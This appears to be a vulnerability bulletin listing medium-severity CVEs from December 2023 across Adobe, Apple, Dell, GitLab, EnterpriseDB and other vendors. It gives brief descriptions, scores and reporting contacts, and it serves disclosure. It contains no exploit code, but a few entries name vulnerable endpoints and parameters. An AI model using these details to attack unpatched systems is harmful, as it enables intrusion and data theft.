adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48615
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48616
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48617
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48618
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48619
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48620
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48621
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48622
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48623
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48624
psirt@adobe.com
adobe — indesign Adobe InDesign versions 19.0 (and earlier) and 17.4.2 (and earlier) are affected by a NULL Pointer Dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47076
psirt@adobe.com
adobe — indesign Adobe InDesign versions 19.0 (and earlier) and 17.4.2 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47077
psirt@adobe.com
adobe — prelude Adobe Prelude versions 22.6 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-44362
psirt@adobe.com
adobe — substance_3d_designer Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-48636
psirt@adobe.com
adobe — substance_3d_designer Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-48637
psirt@adobe.com
adobe — substance_3d_designer Adobe Substance 3D Designer versions 13.0.0 (and earlier) and 13.1.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-48638
psirt@adobe.com
adobe — substance_3d_stager Adobe Substance 3D Stager versions 2.1.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47080
psirt@adobe.com
adobe — substance_3d_stager Adobe Substance 3D Stager versions 2.1.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2023-12-13 5.5 CVE-2023-47081
psirt@adobe.com
alkacon — opencms Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the ‘Mercury’ template. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to a victim and partially take control of their browsing session. 2023-12-13 6.1 CVE-2023-6379
cve-coordination@incibe.es
alkacon — opencms Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the ‘Mercury’ template. An attacker could create a specially crafted URL and send it to a specific user to redirect them to a malicious site and compromise them. Exploitation of this vulnerability is possible due to the fact that there is no proper sanitization of the ‘URI’ parameter. 2023-12-13 6.1 CVE-2023-6380
cve-coordination@incibe.es
ansible — ansible A template injection flaw was found in Ansible where a user’s controller internal templating operations may remove the unsafe designation from template data. This issue could allow an attacker to use a specially crafted file to introduce code injection when supplying templating data. 2023-12-12 6.6 CVE-2023-5764
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
apple — ios/ipados The issue was addressed with improved checks. This issue is fixed in iOS 17.2 and iPadOS 17.2. An attacker with physical access may be able to use Siri to access sensitive user data. 2023-12-12 4.6 CVE-2023-42897
product-security@apple.com
product-security@apple.com
apple — ipados The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, macOS Ventura 13.6.3, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. An app may be able to break out of its sandbox. 2023-12-12 6.3 CVE-2023-42914
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ipados This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, macOS Ventura 13.6.3, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3. An app may be able to disclose kernel memory. 2023-12-12 5.5 CVE-2023-42884
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ipados The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2, watchOS 10.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2. Processing an image may lead to arbitrary code execution. 2023-12-12 5.5 CVE-2023-42898
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ipados A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, macOS Ventura 13.6.3, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. An app may be able to access sensitive user data. 2023-12-12 5.5 CVE-2023-42919
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ipados This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, macOS Ventura 13.6.3, iOS 16.7.3 and iPadOS 16.7.3, macOS Monterey 12.7.2. An app may be able to read sensitive location information. 2023-12-12 5.5 CVE-2023-42922
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ipados This issue was addressed through improved state management. This issue is fixed in iOS 17.2 and iPadOS 17.2. Private Browsing tabs may be accessed without authentication. 2023-12-12 5.3 CVE-2023-42923
product-security@apple.com
product-security@apple.com
apple — ipados A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2. An app may be able to access sensitive user data. 2023-12-12 5.5 CVE-2023-42927
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to monitor keystrokes without user permission. 2023-12-12 5.5 CVE-2023-42891
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to access information about a user’s contacts. 2023-12-12 5.5 CVE-2023-42894
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2. An app may be able to access user-sensitive data. 2023-12-12 5.5 CVE-2023-42900
product-security@apple.com
product-security@apple.com
apple — macos A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3. An app may be able to access sensitive user data. 2023-12-12 5.5 CVE-2023-42924
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to access protected user data. 2023-12-12 5.5 CVE-2023-42932
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — multiple_products The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3. Processing an image may lead to a denial-of-service. 2023-12-12 5.5 CVE-2023-42883
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
archerirm — archer Archer Platform 6.x before 6.13 P2 (6.13.0.2) contains an authenticated HTML content injection vulnerability. A remote authenticated malicious Archer user could potentially exploit this to store malicious HTML code in a trusted application data store. When victim users access the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable application. 6.14 (6.14.0) is also a fixed release. 2023-12-12 5.4 CVE-2023-48642
cve@mitre.org
arduino — create-agent The Arduino Create Agent allows users to use the Arduino Create applications to upload code to any USB connected Arduino board directly from the browser. A vulnerability in versions prior to 1.3.6 affects the endpoint `/certificate.crt` and the way the web interface of the ArduinoCreateAgent handles custom error messages. An attacker that is able to persuade a victim into clicking on a malicious link can perform a Reflected Cross-Site Scripting attack on the web interface of the create agent, which would allow the attacker to execute arbitrary browser client side code. Version 1.3.6 contains a fix for the issue. 2023-12-13 6.3 CVE-2023-49296
security-advisories@github.com
security-advisories@github.com
arm — cortex-a77_firmware Cortex-A77 cores (r0p0 and r1p0) are affected by erratum 1508412 where software, under certain circumstances, could deadlock a core due to the execution of either a load to device or non-cacheable memory, and either a store exclusive or register read of the Physical Address Register (PAR_EL1) in close proximity. 2023-12-08 5.5 CVE-2023-34320
security@xen.org
asterisk — asterisk Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. 2023-12-14 4.9 CVE-2023-49294
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
aveva — edge An issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts’ responses. 2023-12-16 5.3 CVE-2021-42794
cve@mitre.org
cve@mitre.org
cve@mitre.org
beckhoff — twincat/bsd The package authelia-bhf included in Beckhoffs TwinCAT/BSD is prone to an open redirect that allows a remote unprivileged attacker to redirect a user to another site. This may have limited impact to integrity and does solely affect anthelia-bhf the Beckhoff fork of authelia. 2023-12-14 4.3 CVE-2023-6545
info@cert.vde.com
info@cert.vde.com
bitcoin — bitcoin_core In Bitcoin Core through 26.0 and Bitcoin Knots before 25.1.knots20231115, datacarrier size limits can be bypassed by obfuscating data as code (e.g., with OP_FALSE OP_IF), as exploited in the wild by Inscriptions in 2022 and 2023. 2023-12-09 5.3 CVE-2023-50428
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
caddyserver — caddy The caddy-geo-ip (aka GeoIP) middleware through 0.6.0 for Caddy 2, when trust_header X-Forwarded-For is used, allows attackers to spoof their source IP address via an X-Forwarded-For header, which may bypass a protection mechanism (trusted_proxy directive in reverse_proxy or IP address range restrictions). 2023-12-10 6.5 CVE-2023-50463
cve@mitre.org
cve@mitre.org
cve@mitre.org
canonical — ubuntu_server A feature in LXD (LP#1829071), affects the default configuration of Ubuntu Server which allows privileged users in the lxd group to escalate their privilege to root without requiring a sudo password. 2023-12-12 5 CVE-2023-5536
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
cisco — adaptive_security_appliance_software A vulnerability in the AnyConnect SSL VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to send packets with another VPN user’s source IP address. This vulnerability is due to improper validation of the packet’s inner source IP address after decryption. An attacker could exploit this vulnerability by sending crafted packets through the tunnel. A successful exploit could allow the attacker to send a packet impersonating another VPN user’s IP address. It is not possible for the attacker to receive return packets. 2023-12-12 4.3 CVE-2023-20275
ykramarz@cisco.com
ckan — ckan CKAN is an open-source data management system for powering data hubs and data portals. Starting in version 2.0.0 and prior to versions 2.9.10 and 2.10.3, when submitting a POST request to the `/dataset/new` endpoint (including either the auth cookie or the `Authorization` header) with a specially-crafted field, an attacker can create an out-of-memory error in the hosting server. To trigger this error, the attacker need to have permissions to create or edit datasets. This vulnerability has been patched in CKAN 2.10.3 and 2.9.10. 2023-12-13 4.5 CVE-2023-50248
security-advisories@github.com
security-advisories@github.com
cloudflare — quiche quiche v. 0.15.0 through 0.19.0 was discovered to be vulnerable to unbounded queuing of path validation messages, which could lead to excessive resource consumption. QUIC path validation (RFC 9000 Section 8.2) requires that the recipient of a PATH_CHALLENGE frame responds by sending a PATH_RESPONSE. An unauthenticated remote attacker can exploit the vulnerability by sending PATH_CHALLENGE frames and manipulating the connection (e.g. by restricting the peer’s congestion window size) so that PATH_RESPONSE frames can only be sent at the slower rate than they are received; leading to storage of path validation data in an unbounded queue. Quiche versions greater than 0.19.0 address this problem. 2023-12-12 5.3 CVE-2023-6193
cna@cloudflare.com
cna@cloudflare.com
codeastro — pos_and_inventory_management_system A vulnerability has been found in CodeAstro POS and Inventory Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /accounts_con/register_account of the component User Creation Handler. The manipulation of the argument account_type with the input Admin leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247909 was assigned to this vulnerability. 2023-12-13 4.3 CVE-2023-6773
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codeastro — pos_and_inventory_management_system A vulnerability was found in CodeAstro POS and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /accounts_con/register_account. The manipulation of the argument Username with the input leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247910 is the identifier assigned to this vulnerability. 2023-12-13 4.3 CVE-2023-6774
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
collaboraoffice — richdocumentscode Collabora Online is a collaborative online office suite based on LibreOffice technology. Users of Nextcloud with `Collabora Online – Built-in CODE Server` app can be vulnerable to attack via proxy.php. The bug was fixed in Collabora Online – Built-in CODE Server (richdocumentscode) release 23.5.601. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-12-08 6.1 CVE-2023-49782
security-advisories@github.com
security-advisories@github.com
cube-js — cube Cube is a semantic layer for building data applications. Prior to version 0.34.34, it is possible to make the entire Cube API unavailable by submitting a specially crafted request to a Cube API endpoint. The issue has been patched in `v0.34.34` and it’s recommended that all users exposing Cube APIs to the public internet upgrade to the latest version to prevent service disruption. There are currently no workaround for older versions, and the recommendation is to upgrade. 2023-12-13 6.5 CVE-2023-50709
security-advisories@github.com
security-advisories@github.com
dedecms — dedecms DedeCMS v5.7.111 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component select_media_post_wangEditor.php. 2023-12-11 6.1 CVE-2023-49494
cve@mitre.org
cve@mitre.org
dell — powerprotect_dd Dell PowerProtect DD , versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain a path traversal vulnerability. A local high privileged attacker could potentially exploit this vulnerability, to gain unauthorized read and write access to the OS files stored on the server filesystem, with the privileges of the running application. 2023-12-14 6.7 CVE-2023-44278
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD , versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in administrator CLI. A local high privileged attacker could potentially exploit this vulnerability, to bypass security restrictions. Exploitation may lead to a system take over by an attacker 2023-12-14 6.7 CVE-2023-44279
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD , versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an SQL Injection vulnerability. A remote low privileged attacker could potentially exploit this vulnerability, leading to the execution of certain SQL commands on the application’s backend database causing unauthorized read access to application data. 2023-12-14 4.3 CVE-2023-44284
security_alert@emc.com
dell — vapp_manager Dell vApp Manager, versions prior to 9.2.4.x contain an arbitrary file read vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability to read arbitrary files from the target system. 2023-12-14 4.9 CVE-2023-48661
security_alert@emc.com
dompdf — dompdf Dompdf is an HTML to PDF converter for PHP. When parsing SVG images Dompdf performs an initial validation to ensure that paths within the SVG are allowed. One of the validations is that the SVG document does not reference itself. However, prior to version 2.0.4, a recursive chained using two or more SVG documents is not correctly validated. Depending on the system configuration and attack pattern this could exhaust the memory available to the executing process and/or to the server itself. php-svg-lib, when run in isolation, does not support SVG references for `image` elements. However, when used in combination with Dompdf, php-svg-lib will process SVG images referenced by an `image` element. Dompdf currently includes validation to prevent self-referential `image` references, but a chained reference is not checked. A malicious actor may thus trigger infinite recursion by chaining references between two or more SVG images. When Dompdf parses a malicious payload, it will crash due after exceeding the allowed execution time or memory usage. An attacker sending multiple request to a system can potentially cause resource exhaustion to the point that the system is unable to handle incoming request. Version 2.0.4 contains a fix for this issue. 2023-12-13 5.3 CVE-2023-50262
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
elastic — elastic_agent An issue was discovered by Elastic whereby Elastic Agent would log a raw event in its own logs at the WARN or ERROR level if ingesting that event to Elasticsearch failed with any 4xx HTTP status code except 409 or 429. Depending on the nature of the event that Elastic Agent attempted to ingest, this could lead to the insertion of sensitive or private information in the Elastic Agent logs. Elastic has released 8.11.3 and 7.17.16 that prevents this issue by limiting these types of logs to DEBUG level logging, which is disabled by default. 2023-12-12 6.8 CVE-2023-6687
bressers@elastic.co
elastic — enterprise_search An issue was discovered by Elastic whereby the Documents API of App Search logged the raw contents of indexed documents at INFO log level. Depending on the contents of such documents, this could lead to the insertion of sensitive or private information in the App Search logs. Elastic has released 8.11.2 and 7.17.16 that resolves this issue by changing the log level at which these are logged to DEBUG, which is disabled by default. 2023-12-12 6.8 CVE-2023-49923
bressers@elastic.co
bressers@elastic.co
elastic — multiple_products An issue was discovered by Elastic whereby Beats and Elastic Agent would log a raw event in its own logs at the WARN or ERROR level if ingesting that event to Elasticsearch failed with any 4xx HTTP status code except 409 or 429. Depending on the nature of the event that Beats or Elastic Agent attempted to ingest, this could lead to the insertion of sensitive or private information in the Beats or Elastic Agent logs. Elastic has released 8.11.3 and 7.17.16 that prevents this issue by limiting these types of logs to DEBUG level logging, which is disabled by default. 2023-12-12 6.8 CVE-2023-49922
bressers@elastic.co
elecom — wrc-x3000gsn_firmware OS command injection vulnerability in WRC-X3000GSN v1.0.2, WRC-X3000GS v1.0.24 and earlier, and WRC-X3000GSA v1.0.24 and earlier allows a network-adjacent attacker with an administrative privilege to execute an arbitrary OS command by sending a specially crafted request to the product. 2023-12-12 6.8 CVE-2023-49695
vultures@jpcert.or.jp
vultures@jpcert.or.jp
enalean — tuleap Tuleap is an open source suite to improve management of software developments and collaboration. Prior to version 15.2.99.103 or Tuleap Community Edition and prior to versions 15.2-4 and 15.1-8 of Tuleap Enterprise Edition, the name of the releases are not properly escaped on the edition page of a release. A malicious user with the ability to create a FRS release could force a victim having write permissions in the FRS to execute uncontrolled code. Tuleap Community Edition 15.2.99.103, Tuleap Enterprise Edition 15.2-4, and Tuleap Enterprise Edition 15.1-8 contain a fix for this issue. 2023-12-11 5.4 CVE-2023-48715
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It contains the functions get_url_as_text and get_url_as_bytea that are publicly executable, thus permitting an authenticated user to read any file from the local filesystem or remote system regardless of that user’s permissions. 2023-12-12 6.5 CVE-2023-41114
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. When using UTL_ENCODE, an authenticated user can read any large object, regardless of that user’s permissions. 2023-12-12 6.5 CVE-2023-41115
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It permits an authenticated user to use DBMS_PROFILER to remove all accumulated profiling data on a system-wide basis, regardless of that user’s permissions. 2023-12-12 6.5 CVE-2023-41120
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It allows an authenticated user to to obtain information about whether certain files exist on disk, what errors if any occur when attempting to read them, and some limited information about their contents (regardless of permissions). This can occur when a superuser has configured one or more directories for filesystem access via CREATE DIRECTORY and adopted certain non-default settings for log_line_prefix and log_connections. 2023-12-12 4.3 CVE-2023-41113
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It allows an authenticated user to refresh any materialized view, regardless of that user’s permissions. 2023-12-12 4.3 CVE-2023-41116
cve@mitre.org
espeak-ng — espeak-ng Espeak-ng 1.52-dev was discovered to contain a Floating Point Exception via the function PeaksToHarmspect at wavegen.c. 2023-12-12 5.5 CVE-2023-49994
cve@mitre.org
evershop — evershop Cross Site Scripting vulnerability in EverShop NPM versions before v.1.0.0-rc.5 allows a remote attacker to obtain sensitive information via a crafted request to the ProductGrid function in admin/productGrid/Grid.jsx. 2023-12-08 6.1 CVE-2023-46494
cve@mitre.org
cve@mitre.org
evershop — evershop Cross Site Scripting vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the sortBy parameter. 2023-12-08 6.1 CVE-2023-46495
cve@mitre.org
cve@mitre.org
evershop — evershop Cross Site Scripting vulnerability in EverShop NPM versions before v.1.0.0-rc.5 allows a remote attacker to obtain sensitive information via a crafted scripts to the Admin Panel. 2023-12-08 6.1 CVE-2023-46499
cve@mitre.org
cve@mitre.org
evershop — evershop Directory Traversal vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the readDirSync function in fileBrowser/browser.js. 2023-12-08 5.3 CVE-2023-46493
cve@mitre.org
cve@mitre.org
evershop — evershop Directory Traversal vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the mkdirSync function in the folderCreate/createFolder.js endpoint. 2023-12-08 5.4 CVE-2023-46497
cve@mitre.org
cve@mitre.org
fortinet — fortiadc An improper authorization vulnerability [CWE-285] in Fortinet FortiADC version 7.4.0 and before 7.2.2 may allow a low privileged user to read or backup the full system configuration via HTTP or HTTPS requests. 2023-12-13 5.4 CVE-2023-41673
psirt@fortinet.com
fortinet — fortisandbox A improper neutralization of input during web page generation (‘cross-site scripting’) in Fortinet FortiSandbox version 4.4.1 and 4.4.0 and 4.2.0 through 4.2.5 and 4.0.0 through 4.0.3 and 3.2.0 through 3.2.4 and 3.1.0 through 3.1.5 and 3.0.0 through 3.0.4 allows attacker to execute unauthorized code or commands via crafted HTTP requests in capture traffic endpoint. 2023-12-13 5.4 CVE-2023-41844
psirt@fortinet.com
fortinet — fortisandbox An improper neutralization of input during web page generation (‘cross-site scripting’) in Fortinet FortiSandbox version 4.4.1 and 4.4.0 and 4.2.0 through 4.2.5 and 4.0.0 through 4.0.3 and 3.2.0 through 3.2.4 and 3.1.0 through 3.1.5 allows attacker to execute unauthorized code or commands via crafted HTTP requests 2023-12-13 5.4 CVE-2023-45587
psirt@fortinet.com
fortinet — fortiweb An improper output neutralization for logs in Fortinet FortiWeb 6.2.0 – 6.2.8, 6.3.0 – 6.3.23, 7.0.0 – 7.0.9, 7.2.0 – 7.2.5 and 7.4.0 may allow an attacker to forge traffic logs via a crafted URL of the web application. 2023-12-13 5.3 CVE-2023-46713
psirt@fortinet.com
franklin-electric — system_sentinel_anyware Franklin Fueling Systems System Sentinel AnyWare (SSA) version 1.6.24.492 is vulnerable to Open Redirect. The ‘path’ parameter of the prefs.asp resource allows an attacker to redirect a victim user to an arbitrary web site using a crafted URL. 2023-12-08 6.1 CVE-2023-48928
cve@mitre.org
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag. 2023-12-15 5.7 CVE-2023-6051
cve@gitlab.com
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards. 2023-12-15 4.3 CVE-2023-3904
cve@gitlab.com
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API. 2023-12-15 4.3 CVE-2023-5061
cve@gitlab.com
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names leading for incorrect representation in the UI. 2023-12-15 4.8 CVE-2023-5512
cve@gitlab.com
cve@gitlab.com
glpi — glpi GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, the saved search feature can be used to perform a SQL injection. Version 10.0.11 contains a patch for the issue. 2023-12-13 6.5 CVE-2023-43813
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
